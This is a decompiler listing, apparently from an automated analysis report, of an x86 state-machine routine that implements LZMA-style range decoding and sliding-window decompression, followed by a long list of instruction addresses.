                      							_v112 = _v112 - 1;
                      							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                      							_v116 = _v116 + 1;
                      							_t50 =  &_v76;
                      							 *_t50 = _v76 + 1;
                      							__eflags =  *_t50;
                      							L17:
                      							__eflags = _v76 - 4;
                      							if(_v76 < 4) {
                      								goto L15;
                      							}
                      							_t550 = _v68;
                      							__eflags = _t550 - _v120;
                      							if(_t550 == _v120) {
                      								L22:
                      								_v76 = 5;
                      								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                      								goto L25;
                      							}
                      							__eflags = _v12;
                      							_v120 = _t550;
                      							if(_v12 != 0) {
                      								GlobalFree(_v12);
                      							}
                      							_t537 = GlobalAlloc(0x40, _v68); // executed
                      							__eflags = _t537;
                      							_v12 = _t537;
                      							if(_t537 == 0) {
                      								goto L174;
                      							} else {
                      								goto L22;
                      							}
                      						case 2:
                      							L26:
                      							_t557 = _v100 & _v32;
                      							_v136 = 6;
                      							_v80 = _t557;
                      							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                      							goto L135;
                      						case 3:
                      							L23:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 3;
                      								goto L173;
                      							}
                      							_v112 = _v112 - 1;
                      							_t72 =  &_v116;
                      							 *_t72 = _v116 + 1;
                      							__eflags =  *_t72;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L25:
                      							_v76 = _v76 - 1;
                      							__eflags = _v76;
                      							if(_v76 != 0) {
                      								goto L23;
                      							}
                      							goto L26;
                      						case 4:
                      							L136:
                      							_t559 =  *_t626;
                      							_t610 = _t559 & 0x0000ffff;
                      							_t591 = (_v20 >> 0xb) * _t610;
                      							__eflags = _v16 - _t591;
                      							if(_v16 >= _t591) {
                      								_v20 = _v20 - _t591;
                      								_v16 = _v16 - _t591;
                      								_v68 = 1;
                      								_t560 = _t559 - (_t559 >> 5);
                      								__eflags = _t560;
                      								 *_t626 = _t560;
                      							} else {
                      								_v20 = _t591;
                      								_v68 = _v68 & 0x00000000;
                      								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							if(_v20 >= 0x1000000) {
                      								goto L142;
                      							} else {
                      								goto L140;
                      							}
                      						case 5:
                      							L140:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 5;
                      								goto L173;
                      							}
                      							_v20 = _v20 << 8;
                      							_v112 = _v112 - 1;
                      							_t464 =  &_v116;
                      							 *_t464 = _v116 + 1;
                      							__eflags =  *_t464;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L142:
                      							_t561 = _v136;
                      							goto L143;
                      						case 6:
                      							__edx = 0;
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v8;
                      								__ecx = _v60;
                      								_v56 = 1;
                      								_v136 = 7;
                      								__esi = _v8 + 0x180 + _v60 * 2;
                      								goto L135;
                      							}
                      							__eax = _v96 & 0x000000ff;
                      							__esi = _v100;
                      							__cl = 8;
                      							__cl = 8 - _v64;
                      							__esi = _v100 & _v28;
                      							__eax = (_v96 & 0x000000ff) >> 8;
                      							__ecx = _v64;
                      							__esi = (_v100 & _v28) << 8;
                      							__ecx = _v8;
                      							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                      							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                      							__eflags = _v60 - 4;
                      							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                      							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                      							if(_v60 >= 4) {
                      								__eflags = _v60 - 0xa;
                      								if(_v60 >= 0xa) {
                      									_t103 =  &_v60;
                      									 *_t103 = _v60 - 6;
                      									__eflags =  *_t103;
                      								} else {
                      									_v60 = _v60 - 3;
                      								}
                      							} else {
                      								_v60 = 0;
                      							}
                      							__eflags = _v56 - __edx;
                      							if(_v56 == __edx) {
                      								__ebx = 0;
                      								__ebx = 1;
                      								goto L63;
                      							}
                      							__eax = _v24;
                      							__eax = _v24 - _v48;
                      							__eflags = __eax - _v120;
                      							if(__eax >= _v120) {
                      								__eax = __eax + _v120;
                      								__eflags = __eax;
                      							}
                      							__ecx = _v12;
                      							__ebx = 0;
                      							__ebx = 1;
                      							__al =  *((intOrPtr*)(__eax + __ecx));
                      							_v95 =  *((intOrPtr*)(__eax + __ecx));
                      							goto L43;
                      						case 7:
                      							__eflags = _v68 - 1;
                      							if(_v68 != 1) {
                      								__eax = _v40;
                      								_v132 = 0x16;
                      								_v36 = _v40;
                      								__eax = _v44;
                      								_v40 = _v44;
                      								__eax = _v48;
                      								_v44 = _v48;
                      								__eax = 0;
                      								__eflags = _v60 - 7;
                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      								__al = __al & 0x000000fd;
                      								__eax = (__eflags >= 0) - 1 + 0xa;
                      								_v60 = (__eflags >= 0) - 1 + 0xa;
                      								__eax = _v8;
                      								__eax = _v8 + 0x664;
                      								__eflags = __eax;
                      								_v92 = __eax;
                      								goto L71;
                      							}
                      							__eax = _v8;
                      							__ecx = _v60;
                      							_v136 = 8;
                      							__esi = _v8 + 0x198 + _v60 * 2;
                      							goto L135;
                      						case 8:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v8;
                      								__ecx = _v60;
                      								_v136 = 0xa;
                      								__esi = _v8 + 0x1b0 + _v60 * 2;
                      							} else {
                      								__eax = _v60;
                      								__ecx = _v8;
                      								__eax = _v60 + 0xf;
                      								_v136 = 9;
                      								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                      								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                      							}
                      							goto L135;
                      						case 9:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								goto L92;
                      							}
                      							__eflags = _v100;
                      							if(_v100 == 0) {
                      								goto L174;
                      							}
                      							__eax = 0;
                      							__eflags = _v60 - 7;
                      							_t264 = _v60 - 7 >= 0;
                      							__eflags = _t264;
                      							0 | _t264 = _t264 + _t264 + 9;
                      							_v60 = _t264 + _t264 + 9;
                      							goto L78;
                      						case 0xa:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v8;
                      								__ecx = _v60;
                      								_v136 = 0xb;
                      								__esi = _v8 + 0x1c8 + _v60 * 2;
                      								goto L135;
                      							}
                      							__eax = _v44;
                      							goto L91;
                      						case 0xb:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__ecx = _v40;
                      								__eax = _v36;
                      								_v36 = _v40;
                      							} else {
                      								__eax = _v40;
                      							}
                      							__ecx = _v44;
                      							_v40 = _v44;
                      							L91:
                      							__ecx = _v48;
                      							_v48 = __eax;
                      							_v44 = _v48;
                      							L92:
                      							__eax = _v8;
                      							_v132 = 0x15;
                      							__eax = _v8 + 0xa68;
                      							_v92 = _v8 + 0xa68;
                      							goto L71;
                      						case 0xc:
                      							L102:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xc;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t340 =  &_v116;
                      							 *_t340 = _v116 + 1;
                      							__eflags =  *_t340;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							__eax = _v48;
                      							goto L104;
                      						case 0xd:
                      							L39:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xd;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t127 =  &_v116;
                      							 *_t127 = _v116 + 1;
                      							__eflags =  *_t127;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L41:
                      							__eax = _v68;
                      							__eflags = _v76 - _v68;
                      							if(_v76 != _v68) {
                      								goto L50;
                      							}
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								goto L56;
                      							}
                      							L43:
                      							__eax = _v95 & 0x000000ff;
                      							_v95 = _v95 << 1;
                      							__ecx = _v92;
                      							__eax = (_v95 & 0x000000ff) >> 7;
                      							_v76 = __eax;
                      							__eax = __eax + 1;
                      							__eax = __eax << 8;
                      							__eax = __eax + __ebx;
                      							__esi = _v92 + __eax * 2;
                      							_v20 = _v20 >> 0xb;
                      							__ax =  *__esi;
                      							_v88 = __esi;
                      							__edx = __ax & 0x0000ffff;
                      							__ecx = (_v20 >> 0xb) * __edx;
                      							__eflags = _v16 - __ecx;
                      							if(_v16 >= __ecx) {
                      								_v20 = _v20 - __ecx;
                      								_v16 = _v16 - __ecx;
                      								__cx = __ax;
                      								_v68 = 1;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								__ebx = __ebx + __ebx + 1;
                      								 *__esi = __ax;
                      							} else {
                      								_v68 = _v68 & 0x00000000;
                      								_v20 = __ecx;
                      								0x800 = 0x800 - __edx;
                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							_v72 = __ebx;
                      							if(_v20 >= 0x1000000) {
                      								goto L41;
                      							} else {
                      								goto L39;
                      							}
                      						case 0xe:
                      							L48:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xe;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t161 =  &_v116;
                      							 *_t161 = _v116 + 1;
                      							__eflags =  *_t161;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							while(1) {
                      								L50:
                      								__eflags = __ebx - 0x100;
                      								if(__ebx >= 0x100) {
                      									break;
                      								}
                      								__eax = _v92;
                      								__edx = __ebx + __ebx;
                      								__ecx = _v20;
                      								__esi = __edx + __eax;
                      								__ecx = _v20 >> 0xb;
                      								__ax =  *__esi;
                      								_v88 = __esi;
                      								__edi = __ax & 0x0000ffff;
                      								__ecx = (_v20 >> 0xb) * __edi;
                      								__eflags = _v16 - __ecx;
                      								if(_v16 >= __ecx) {
                      									_v20 = _v20 - __ecx;
                      									_v16 = _v16 - __ecx;
                      									__cx = __ax;
                      									_t175 = __edx + 1; // 0x1
                      									__ebx = _t175;
                      									__cx = __ax >> 5;
                      									__eflags = __eax;
                      									 *__esi = __ax;
                      								} else {
                      									_v20 = __ecx;
                      									0x800 = 0x800 - __edi;
                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      									__ebx = __ebx + __ebx;
                      									 *__esi = __cx;
                      								}
                      								__eflags = _v20 - 0x1000000;
                      								_v72 = __ebx;
                      								if(_v20 >= 0x1000000) {
                      									continue;
                      								} else {
                      									goto L48;
                      								}
                      							}
                      							L56:
                      							_t178 =  &_v56;
                      							 *_t178 = _v56 & 0x00000000;
                      							__eflags =  *_t178;
                      							goto L57;
                      						case 0xf:
                      							L60:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xf;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t208 =  &_v116;
                      							 *_t208 = _v116 + 1;
                      							__eflags =  *_t208;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L62:
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								L57:
                      								__al = _v72;
                      								_v96 = _v72;
                      								goto L58;
                      							}
                      							L63:
                      							__eax = _v92;
                      							__edx = __ebx + __ebx;
                      							__ecx = _v20;
                      							__esi = __edx + __eax;
                      							__ecx = _v20 >> 0xb;
                      							__ax =  *__esi;
                      							_v88 = __esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = (_v20 >> 0xb) * __edi;
                      							__eflags = _v16 - __ecx;
                      							if(_v16 >= __ecx) {
                      								_v20 = _v20 - __ecx;
                      								_v16 = _v16 - __ecx;
                      								__cx = __ax;
                      								_t222 = __edx + 1; // 0x1
                      								__ebx = _t222;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								 *__esi = __ax;
                      							} else {
                      								_v20 = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							_v72 = __ebx;
                      							if(_v20 >= 0x1000000) {
                      								goto L62;
                      							} else {
                      								goto L60;
                      							}
                      						case 0x10:
                      							L112:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0x10;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t371 =  &_v116;
                      							 *_t371 = _v116 + 1;
                      							__eflags =  *_t371;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							goto L114;
                      						case 0x11:
                      							L71:
                      							__esi = _v92;
                      							_v136 = 0x12;
                      							goto L135;
                      						case 0x12:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v92;
                      								_v136 = 0x13;
                      								__esi = _v92 + 2;
                      								L135:
                      								_v88 = _t626;
                      								goto L136;
                      							}
                      							__eax = _v80;
                      							_v52 = _v52 & 0x00000000;
                      							__ecx = _v92;
                      							__eax = _v80 << 4;
                      							__eflags = __eax;
                      							__eax = _v92 + __eax + 4;
                      							goto L133;
                      						case 0x13:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								_t475 =  &_v92;
                      								 *_t475 = _v92 + 0x204;
                      								__eflags =  *_t475;
                      								_v52 = 0x10;
                      								_v68 = 8;
                      								L147:
                      								_v128 = 0x14;
                      								goto L148;
                      							}
                      							__eax = _v80;
                      							__ecx = _v92;
                      							__eax = _v80 << 4;
                      							_v52 = 8;
                      							__eax = _v92 + (_v80 << 4) + 0x104;
                      							L133:
                      							_v92 = __eax;
                      							_v68 = 3;
                      							goto L147;
                      						case 0x14:
                      							_v52 = _v52 + __ebx;
                      							__eax = _v132;
                      							goto L143;
                      						case 0x15:
                      							__eax = 0;
                      							__eflags = _v60 - 7;
                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      							__al = __al & 0x000000fd;
                      							__eax = (__eflags >= 0) - 1 + 0xb;
                      							_v60 = (__eflags >= 0) - 1 + 0xb;
                      							goto L123;
                      						case 0x16:
                      							__eax = _v52;
                      							__eflags = __eax - 4;
                      							if(__eax >= 4) {
                      								_push(3);
                      								_pop(__eax);
                      							}
                      							__ecx = _v8;
                      							_v68 = 6;
                      							__eax = __eax << 7;
                      							_v128 = 0x19;
                      							_v92 = __eax;
                      							goto L148;
                      						case 0x17:
                      							L148:
                      							__eax = _v68;
                      							_v84 = 1;
                      							_v76 = _v68;
                      							goto L152;
                      						case 0x18:
                      							L149:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0x18;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t490 =  &_v116;
                      							 *_t490 = _v116 + 1;
                      							__eflags =  *_t490;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L151:
                      							_t493 =  &_v76;
                      							 *_t493 = _v76 - 1;
                      							__eflags =  *_t493;
                      							L152:
                      							__eflags = _v76;
                      							if(_v76 <= 0) {
                      								__ecx = _v68;
                      								__ebx = _v84;
                      								0 = 1;
                      								__eax = 1 << __cl;
                      								__ebx = _v84 - (1 << __cl);
                      								__eax = _v128;
                      								_v72 = __ebx;
                      								L143:
                      								_v140 = _t561;
                      								goto L3;
                      							}
                      							__eax = _v84;
                      							_v20 = _v20 >> 0xb;
                      							__edx = _v84 + _v84;
                      							__eax = _v92;
                      							__esi = __edx + __eax;
                      							_v88 = __esi;
                      							__ax =  *__esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = (_v20 >> 0xb) * __edi;
                      							__eflags = _v16 - __ecx;
                      							if(_v16 >= __ecx) {
                      								_v20 = _v20 - __ecx;
                      								_v16 = _v16 - __ecx;
                      								__cx = __ax;
                      								__cx = __ax >> 5;
                      								__eax = __eax - __ecx;
                      								__edx = __edx + 1;
                      								__eflags = __edx;
                      								 *__esi = __ax;
                      								_v84 = __edx;
                      							} else {
                      								_v20 = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								_v84 = _v84 << 1;
                      								 *__esi = __cx;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							if(_v20 >= 0x1000000) {
                      								goto L151;
                      							} else {
                      								goto L149;
                      							}
                      						case 0x19:
                      							__eflags = __ebx - 4;
                      							if(__ebx < 4) {
                      								_v48 = __ebx;
                      								L122:
                      								_t399 =  &_v48;
                      								 *_t399 = _v48 + 1;
                      								__eflags =  *_t399;
                      								L123:
                      								__eax = _v48;
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									_v52 = _v52 | 0xffffffff;
                      									goto L173;
                      								}
                      								__eflags = __eax - _v100;
                      								if(__eax > _v100) {
                      									goto L174;
                      								}
                      								_v52 = _v52 + 2;
                      								__eax = _v52;
                      								_t406 =  &_v100;
                      								 *_t406 = _v100 + _v52;
                      								__eflags =  *_t406;
                      								goto L126;
                      							}
                      							__ecx = __ebx;
                      							__eax = __ebx;
                      							__ecx = __ebx >> 1;
                      							__eax = __ebx & 0x00000001;
                      							__ecx = (__ebx >> 1) - 1;
                      							__al = __al | 0x00000002;
                      							__eax = (__ebx & 0x00000001) << __cl;
                      							__eflags = __ebx - 0xe;
                      							_v48 = __eax;
                      							if(__ebx >= 0xe) {
                      								__ebx = 0;
                      								_v76 = __ecx;
                      								L105:
                      								__eflags = _v76;
                      								if(_v76 <= 0) {
                      									__eax = __eax + __ebx;
                      									_v68 = 4;
                      									_v48 = __eax;
                      									__eax = _v8;
                      									__eax = _v8 + 0x644;
                      									__eflags = __eax;
                      									L111:
                      									__ebx = 0;
                      									_v92 = __eax;
                      									_v84 = 1;
                      									_v72 = 0;
                      									_v76 = 0;
                      									L115:
                      									__eax = _v68;
                      									__eflags = _v76 - _v68;
                      									if(_v76 >= _v68) {
                      										_t397 =  &_v48;
                      										 *_t397 = _v48 + __ebx;
                      										__eflags =  *_t397;
                      										goto L122;
                      									}
                      									__eax = _v84;
                      									_v20 = _v20 >> 0xb;
                      									__edi = _v84 + _v84;
                      									__eax = _v92;
                      									__esi = __edi + __eax;
                      									_v88 = __esi;
                      									__ax =  *__esi;
                      									__ecx = __ax & 0x0000ffff;
                      									__edx = (_v20 >> 0xb) * __ecx;
                      									__eflags = _v16 - __edx;
                      									if(_v16 >= __edx) {
                      										__ecx = 0;
                      										_v20 = _v20 - __edx;
                      										__ecx = 1;
                      										_v16 = _v16 - __edx;
                      										__ebx = 1;
                      										__ecx = _v76;
                      										__ebx = 1 << __cl;
                      										__ecx = 1 << __cl;
                      										__ebx = _v72;
                      										__ebx = _v72 | __ecx;
                      										__cx = __ax;
                      										__cx = __ax >> 5;
                      										__eax = __eax - __ecx;
                      										__edi = __edi + 1;
                      										__eflags = __edi;
                      										_v72 = __ebx;
                      										 *__esi = __ax;
                      										_v84 = __edi;
                      									} else {
                      										_v20 = __edx;
                      										0x800 = 0x800 - __ecx;
                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      										_v84 = _v84 << 1;
                      										 *__esi = __dx;
                      									}
                      									__eflags = _v20 - 0x1000000;
                      									if(_v20 >= 0x1000000) {
                      										L114:
                      										_t374 =  &_v76;
                      										 *_t374 = _v76 + 1;
                      										__eflags =  *_t374;
                      										goto L115;
                      									} else {
                      										goto L112;
                      									}
                      								}
                      								__ecx = _v16;
                      								__ebx = __ebx + __ebx;
                      								_v20 = _v20 >> 1;
                      								__eflags = _v16 - _v20;
                      								_v72 = __ebx;
                      								if(_v16 >= _v20) {
                      									__ecx = _v20;
                      									_v16 = _v16 - _v20;
                      									__ebx = __ebx | 0x00000001;
                      									__eflags = __ebx;
                      									_v72 = __ebx;
                      								}
                      								__eflags = _v20 - 0x1000000;
                      								if(_v20 >= 0x1000000) {
                      									L104:
                      									_t344 =  &_v76;
                      									 *_t344 = _v76 - 1;
                      									__eflags =  *_t344;
                      									goto L105;
                      								} else {
                      									goto L102;
                      								}
                      							}
                      							__edx = _v8;
                      							__eax = __eax - __ebx;
                      							_v68 = __ecx;
                      							__eax = _v8 + 0x55e + __eax * 2;
                      							goto L111;
                      						case 0x1a:
                      							L58:
                      							__eflags = _v104;
                      							if(_v104 == 0) {
                      								_v140 = 0x1a;
                      								goto L173;
                      							}
                      							__ecx = _v108;
                      							__al = _v96;
                      							__edx = _v12;
                      							_v100 = _v100 + 1;
                      							_v108 = _v108 + 1;
                      							_v104 = _v104 - 1;
                      							 *_v108 = __al;
                      							__ecx = _v24;
                      							 *(_v12 + __ecx) = __al;
                      							__eax = __ecx + 1;
                      							__edx = 0;
                      							_t197 = __eax % _v120;
                      							__eax = __eax / _v120;
                      							__edx = _t197;
                      							goto L82;
                      						case 0x1b:
                      							L78:
                      							__eflags = _v104;
                      							if(_v104 == 0) {
                      								_v140 = 0x1b;
                      								goto L173;
                      							}
                      							__eax = _v24;
                      							__eax = _v24 - _v48;
                      							__eflags = __eax - _v120;
                      							if(__eax >= _v120) {
                      								__eax = __eax + _v120;
                      								__eflags = __eax;
                      							}
                      							__edx = _v12;
                      							__cl =  *(__edx + __eax);
                      							__eax = _v24;
                      							_v96 = __cl;
                      							 *(__edx + __eax) = __cl;
                      							__eax = __eax + 1;
                      							__edx = 0;
                      							_t280 = __eax % _v120;
                      							__eax = __eax / _v120;
                      							__edx = _t280;
                      							__eax = _v108;
                      							_v100 = _v100 + 1;
                      							_v108 = _v108 + 1;
                      							_t289 =  &_v104;
                      							 *_t289 = _v104 - 1;
                      							__eflags =  *_t289;
                      							 *_v108 = __cl;
                      							L82:
                      							_v24 = __edx;
                      							goto L83;
                      						case 0x1c:
                      							while(1) {
                      								L126:
                      								__eflags = _v104;
                      								if(_v104 == 0) {
                      									break;
                      								}
                      								__eax = _v24;
                      								__eax = _v24 - _v48;
                      								__eflags = __eax - _v120;
                      								if(__eax >= _v120) {
                      									__eax = __eax + _v120;
                      									__eflags = __eax;
                      								}
                      								__edx = _v12;
                      								__cl =  *(__edx + __eax);
                      								__eax = _v24;
                      								_v96 = __cl;
                      								 *(__edx + __eax) = __cl;
                      								__eax = __eax + 1;
                      								__edx = 0;
                      								_t420 = __eax % _v120;
                      								__eax = __eax / _v120;
                      								__edx = _t420;
                      								__eax = _v108;
                      								_v108 = _v108 + 1;
                      								_v104 = _v104 - 1;
                      								_v52 = _v52 - 1;
                      								__eflags = _v52;
                      								 *_v108 = __cl;
                      								_v24 = _t420;
                      								if(_v52 > 0) {
                      									continue;
                      								} else {
                      									L83:
                      									_v140 = 2;
                      									goto L3;
                      								}
                      							}
                      							_v140 = 0x1c;
                      							L173:
                      							_push(0x22);
                      							_pop(_t574);
                      							memcpy(_v148,  &_v140, _t574 << 2);
                      							return 0;
                      					}
                      				}
                      				L174:
                      				_t538 = _t537 | 0xffffffff;
                      				return _t538;
                      			}










































                      0x00406bc0
                      0x00406bc7
                      0x00406bcd
                      0x00406bd3
                      0x00000000
                      0x00406bd7
                      0x00406be3
                      0x00406be3
                      0x00406be3
                      0x00406bec
                      0x00000000
                      0x00000000
                      0x00406bf2
                      0x00000000
                      0x00406bf9
                      0x00406bfd
                      0x00000000
                      0x00000000
                      0x00406c06
                      0x00406c09
                      0x00406c0c
                      0x00406c0e
                      0x00406c10
                      0x00000000
                      0x00000000
                      0x00406c16
                      0x00406c19
                      0x00406c1b
                      0x00406c1c
                      0x00406c1f
                      0x00406c21
                      0x00406c22
                      0x00406c24
                      0x00406c27
                      0x00406c2c
                      0x00406c31
                      0x00406c3a
                      0x00406c4d
                      0x00406c50
                      0x00406c59
                      0x00406c5c
                      0x00406c84
                      0x00406c84
                      0x00406c86
                      0x00406c94
                      0x00406c94
                      0x00406c98
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406c88
                      0x00406c88
                      0x00406c8b
                      0x00406c8b
                      0x00406c8c
                      0x00406c8c
                      0x00000000
                      0x00406c88
                      0x00406c5e
                      0x00406c62
                      0x00406c67
                      0x00406c67
                      0x00406c70
                      0x00406c76
                      0x00406c78
                      0x00406c7b
                      0x00000000
                      0x00406c81
                      0x00406c81
                      0x00000000
                      0x00406c81
                      0x00000000
                      0x00406c9e
                      0x00406c9e
                      0x00406ca2
                      0x0040754e
                      0x00000000
                      0x0040754e
                      0x00406cab
                      0x00406cbb
                      0x00406cbe
                      0x00406cc1
                      0x00406cc1
                      0x00406cc1
                      0x00406cc4
                      0x00406cc4
                      0x00406cc8
                      0x00000000
                      0x00000000
                      0x00406cca
                      0x00406ccd
                      0x00406cd0
                      0x00406cfa
                      0x00406d00
                      0x00406d07
                      0x00000000
                      0x00406d07
                      0x00406cd2
                      0x00406cd6
                      0x00406cd9
                      0x00406cde
                      0x00406cde
                      0x00406ce9
                      0x00406cef
                      0x00406cf1
                      0x00406cf4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406d39
                      0x00406d3f
                      0x00406d42
                      0x00406d4f
                      0x00406d57
                      0x00000000
                      0x00000000
                      0x00406d0e
                      0x00406d0e
                      0x00406d12
                      0x0040755d
                      0x00000000
                      0x0040755d
                      0x00406d1e
                      0x00406d29
                      0x00406d29
                      0x00406d29
                      0x00406d2c
                      0x00406d2f
                      0x00406d32
                      0x00406d35
                      0x00406d37
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004073ce
                      0x004073ce
                      0x004073d4
                      0x004073da
                      0x004073dd
                      0x004073e0
                      0x004073fa
                      0x004073fd
                      0x00407403
                      0x0040740e
                      0x0040740e
                      0x00407410
                      0x004073e2
                      0x004073e2
                      0x004073f1
                      0x004073f5
                      0x004073f5
                      0x00407413
                      0x0040741a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040741c
                      0x0040741c
                      0x00407420
                      0x004075cf
                      0x00000000
                      0x004075cf
                      0x0040742c
                      0x00407433
                      0x0040743b
                      0x0040743b
                      0x0040743b
                      0x0040743e
                      0x00407441
                      0x00407441
                      0x00000000
                      0x00000000
                      0x00406d5f
                      0x00406d61
                      0x00406d64
                      0x00406dd5
                      0x00406dd8
                      0x00406ddb
                      0x00406de2
                      0x00406dec
                      0x00000000
                      0x00406dec
                      0x00406d66
                      0x00406d6a
                      0x00406d6d
                      0x00406d6f
                      0x00406d72
                      0x00406d75
                      0x00406d77
                      0x00406d7a
                      0x00406d7c
                      0x00406d81
                      0x00406d84
                      0x00406d87
                      0x00406d8b
                      0x00406d92
                      0x00406d95
                      0x00406d9c
                      0x00406da0
                      0x00406da8
                      0x00406da8
                      0x00406da8
                      0x00406da2
                      0x00406da2
                      0x00406da2
                      0x00406d97
                      0x00406d97
                      0x00406d97
                      0x00406dac
                      0x00406daf
                      0x00406dcd
                      0x00406dcf
                      0x00000000
                      0x00406dcf
                      0x00406db1
                      0x00406db4
                      0x00406db7
                      0x00406dba
                      0x00406dbc
                      0x00406dbc
                      0x00406dbc
                      0x00406dbf
                      0x00406dc2
                      0x00406dc4
                      0x00406dc5
                      0x00406dc8
                      0x00000000
                      0x00000000
                      0x00406ffe
                      0x00407002
                      0x00407020
                      0x00407023
                      0x0040702a
                      0x0040702d
                      0x00407030
                      0x00407033
                      0x00407036
                      0x00407039
                      0x0040703b
                      0x00407042
                      0x00407043
                      0x00407045
                      0x00407048
                      0x0040704b
                      0x0040704e
                      0x0040704e
                      0x00407053
                      0x00000000
                      0x00407053
                      0x00407004
                      0x00407007
                      0x0040700a
                      0x00407014
                      0x00000000
                      0x00000000
                      0x00407068
                      0x0040706c
                      0x0040708f
                      0x00407092
                      0x00407095
                      0x0040709f
                      0x0040706e
                      0x0040706e
                      0x00407071
